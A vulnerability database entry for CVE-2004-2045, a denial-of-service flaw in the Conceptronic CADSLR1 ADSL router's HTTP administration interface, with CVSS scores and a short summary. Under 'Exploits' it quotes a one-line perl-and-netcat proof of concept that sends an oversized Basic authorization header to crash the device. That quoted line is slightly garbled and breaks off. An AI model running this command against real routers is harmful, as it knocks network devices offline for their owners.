5
CVSSv2

CVE-2004-2045

Published: 31/12/2004 Updated: 11/07/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The HTTP administration interface on Conceptronic CADSLR1 ADSL router running firmware 3.04n allows remote malicious users to cause a denial of service (device reboot) via an HTTP request with a long username.

Vulnerable Product Search on Vulmon Subscribe to Product

conceptronic cadslr1 adsl router 3.04n

Exploits

$ $victima="ipvictim" $ perl -e 'print "GET / HTTP/11\r\nHost: '"$victima"'\r\nAuthorization: Basic " 'A' x 65536 "\r\n\r\n"' | nc -vvn $victima 80 # milw0rmcom [2004-07-22] ...